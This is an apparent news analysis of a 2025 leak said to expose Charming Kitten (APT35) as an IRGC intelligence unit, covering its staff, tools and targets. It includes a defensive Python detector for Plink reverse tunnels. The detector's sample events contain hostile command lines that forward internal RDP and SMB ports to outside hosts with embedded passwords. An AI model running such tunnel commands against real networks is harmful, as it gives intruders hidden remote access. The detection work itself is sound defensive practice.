In October 2025, one of the most extensive leaks in the history of Iranian cyber operations began circulating online. The exposed materials — published by an anonymous account under the name KittenBusters — unravel the internal structure, tools, and personnel of Charming Kitten, a state-sponsored cyber unit operating under the Intelligence Organization of the Islamic Revolutionary Guard Corps (IRGC-IO).
What was long suspected through scattered cybersecurity reports now appears to be confirmed by internal evidence: Charming Kitten is not a loose hacker group but a formal division of Iran’s counterintelligence apparatus.
From “APT35” to Unit 1500
Western cybersecurity companies have tracked this actor for over a decade under aliases such as APT35, Phosphorus, or Newscaster. The leaks now identify it as Department 40 of the IRGC-IO’s Counterintelligence Division (Unit 1500) — a dedicated branch tasked with digital infiltration, psychological operations, and monitoring of political and civil-society targets inside and outside Iran.
Documents in the first episodes reveal a detailed hierarchy. At the top stands Abbas Rahrovi (alias Abbas Hosseini), an IRGC official with multiple front companies registered in Iran. Below him, employees handle daily tasks ranging from malware development and penetration testing to social-media manipulation and open-source reconnaissance.
Malware Arsenal and Technical Capabilities
The leaked source code includes a series of custom remote-access and espionage tools. Among them is BellaCiao, previously analyzed by Bitdefender: a .NET-based dropper capable of delivering C# webshells or PowerShell scripts that establish reverse proxies through Plink. Another component, codenamed Thaqib, uses encryption and routing through the Tor network to conceal command-and-control servers, coupled with strong anti-debugging and anti-analysis features designed to evade antivirus detection (so-called FUD, or "fully undetectable", builds).
Other scripts and logs show training exercises on antivirus evasion, file-obfuscation techniques, and behavioral testing against commercial security products. Together, these tools demonstrate a level of maturity uncommon in regional threat actors, revealing a sustained investment in research and internal QA processes, hallmarks of a formal military program rather than a freelance hacking crew.
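As an added defensive illustration (not code from the leak, from KittenBusters, or from Bitdefender's analysis), the following Python script applies a heuristic to process-creation telemetry to flag Plink launched with remote port forwarding (`-R`), the reverse-proxy pattern attributed to BellaCiao above. The event structure, field names, sample command lines and IP addresses are constructed for the example; Plink's `-R`, `-N`, `-pw` and `-batch` options are real PuTTY options. The check deliberately keys on the option pattern rather than only the file name, so a renamed binary still scores.

```python
"""Heuristic detection of Plink-style reverse tunnels in process-creation events.

Added example; it assumes events reduced to three fields such as one would
extract from Sysmon Event ID 1 or EDR telemetry. All sample data is constructed.
"""
import os
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str           # path of the created process (Sysmon: Image)
    command_line: str    # Sysmon: CommandLine
    parent_image: str    # Sysmon: ParentImage


# Plink's -R flag requests remote (reverse) port forwarding:
#   -R [listen-addr:]listen-port:target-host:target-port
# The SSH server listens and relays connections back through the client, which is
# how a dropper can expose internal hosts to an operator-controlled server.
FORWARD_SPEC = re.compile(r"^(?:[^\s]+:)?\d{1,5}:[^:\s]+:\d{1,5}$")

# Parents that suggest scripted or webshell-driven execution rather than an
# administrator typing the command interactively.
SCRIPTED_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                    "cscript.exe", "w3wp.exe", "mshta.exe"}


def reverse_forwards(argv):
    """Extract -R forwarding specs, accepting both '-R spec' and '-Rspec' forms."""
    specs = []
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok == "-R" and i + 1 < len(argv):
            cand, i = argv[i + 1], i + 2
        elif tok.startswith("-R") and len(tok) > 2:
            cand, i = tok[2:], i + 1
        else:
            i += 1
            continue
        if FORWARD_SPEC.match(cand):
            specs.append(cand)
    return specs


def analyze_event(ev):
    """Return a finding dict if the event looks like a Plink reverse tunnel, else None."""
    argv = ev.command_line.split()
    specs = reverse_forwards(argv)
    if not specs:
        return None  # local (-L) and dynamic (-D) forwards are out of scope here
    reasons = ["reverse port forward (-R) requested"]
    basename = os.path.basename(ev.image.replace("\\", "/")).lower()
    if "plink" in basename or "plink" in ev.command_line.lower():
        reasons.append("plink binary named on command line")
    if "-N" in argv:
        reasons.append("-N: tunnel only, no interactive session")
    if "-pw" in argv:
        reasons.append("-pw: password embedded for unattended use")
    if "-batch" in argv:
        reasons.append("-batch: non-interactive mode")
    parent = os.path.basename(ev.parent_image.replace("\\", "/")).lower()
    if parent in SCRIPTED_PARENTS:
        reasons.append(f"launched by {parent}")
    severity = "high" if len(reasons) >= 4 else "medium"
    return {"image": ev.image, "forwards": specs, "severity": severity, "reasons": reasons}


def scan(events):
    """Run the heuristic over a list of events and return the non-empty findings."""
    return [f for f in (analyze_event(e) for e in events) if f]


# Constructed sample events (paths, hosts and addresses are illustrative only).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Users\Public\plink.exe",
                 r"C:\Users\Public\plink.exe -ssh -N -R 3389:127.0.0.1:3389 -pw Secret123 tunnel@203.0.113.10 -P 443",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(r"C:\Windows\Temp\svchost32.exe",  # renamed binary, same option pattern
                 r"C:\Windows\Temp\svchost32.exe -N -batch -R0.0.0.0:8080:10.0.0.5:445 -pw x ops@198.51.100.7",
                 r"C:\Windows\System32\inetsrv\w3wp.exe"),
    ProcessEvent(r"C:\Program Files\PuTTY\plink.exe",  # benign local forward by an admin
                 r"C:\Program Files\PuTTY\plink.exe -ssh -L 5901:localhost:5901 admin@jumpbox.corp.example",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe",
                 r"C:\Windows\System32\notepad.exe readme.txt",
                 r"C:\Windows\explorer.exe"),
]

FINDINGS = scan(SAMPLE_EVENTS)

if __name__ == "__main__":
    for f in FINDINGS:
        print(f["severity"].upper(), f["image"], f["forwards"], "; ".join(f["reasons"]))
```

In production the same logic would run over the raw telemetry stream and the `-L`/`-D` cases would usually still be worth a low-severity record, since the leak describes PowerShell rather than an administrator as the launcher.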
Human Infrastructure Behind the Code
Perhaps the most revealing aspect of the leak is the visibility it provides into the human side of the operation. Daily work reports recovered from Department 40’s internal network detail the routine tasks of engineers and content operators.
- Majid (MJD) led the team responsible for building and scheduling fake social-media accounts across Instagram, X, Facebook, and YouTube. He coordinated content approval with management and received payments through an office labeled “Daftar Elahiyeh” — indicating a central administrative hub in northern Tehran. In July 2024, he also monitored Arabic and English media about Mohammed bin Zayed, the ruler of the UAE, suggesting an effort to shape regional narratives.
- Hossein (HSN) managed phishing infrastructure. His reports describe configuring MailWizz servers, integrating Amazon SES/SNS for mass email delivery, and developing an internal “RTM” (Remote Task Module) capable of brute-force or multi-threaded execution — a blend of marketing-automation and intrusion tooling.
- Mahyar (MHX) focused on OSINT collection using platforms like Shodan, ZoomEye, and FOFA to map potential targets, including telecommunications firms in the Gulf and Levant. His workflow documents cross-reference Israeli corporate data and employee lists — a clear bridge between open-source reconnaissance and active targeting.
- Hesam, Shayan, and Amirhossein appear as penetration testers and exploit developers. Their logs show practical exercises exploiting vulnerabilities in GitLab, Confluence, Jenkins, and even network routers. In one case, Shayan achieved remote code execution on an Israeli domain and deployed a webshell before erasing logs — a level of tradecraft consistent with state-sponsored operations.
Regional Targeting and the Roshan Operation
Beyond Israel and the Gulf, leaked folders labeled “Roshan” suggest operations against Roshan Telecom, Afghanistan’s largest mobile operator. The directory contained SQL-injection logs, internal table dumps, and user lists bearing the prefix “ROSHAN\”. Such data could facilitate credential harvesting and social-engineering attacks against Afghan users and journalists.
While attribution remains under analysis, the format and language of the logs align with Department 40’s internal coding conventions, making it one of the first direct links between the IRGC’s cyber units and Afghan telecom surveillance.
Why This Matters
The Charming Kitten leaks collapse the plausible deniability that has long shielded Tehran’s cyber operations. For years, Iran’s government portrayed hacking incidents as either Western fabrications or the work of patriotic volunteers. The internal documents, chat logs, and payment records now point to an institutional structure, with payrolls, project tracking, and explicit managerial oversight, operating within the IRGC’s counterintelligence division.
These revelations also blur the line between espionage and domestic repression. The same infrastructure used to target Israeli companies or Western research institutes appears to monitor Iranian dissidents abroad and even manage online harassment campaigns. Charming Kitten’s “social-media” branch effectively functions as a propaganda arm integrated into the cyber command chain.
The Broader Pattern
This exposure follows years of growing evidence about Iran’s hybrid warfare strategy — combining information operations, cyberattacks, and influence campaigns under the Supreme Council of Cyberspace (SCC).
While Western cybersecurity firms often isolate each malware strain as a technical threat, the leaked internal materials reveal a single continuum: from reconnaissance and intrusion to psychological operations and narrative warfare.
What Comes Next
KittenBusters, the anonymous group behind the release, has announced that more episodes are forthcoming. If the next sets of documents confirm financial and communication links to other IRGC-affiliated entities, it could open the door for new rounds of international sanctions and counter-espionage investigations.
For researchers, the Charming Kitten leaks are more than a window into Iran’s cyber command; they are a rare glimpse into the bureaucratic soul of digital authoritarianism: structured, methodical, and quietly ruthless.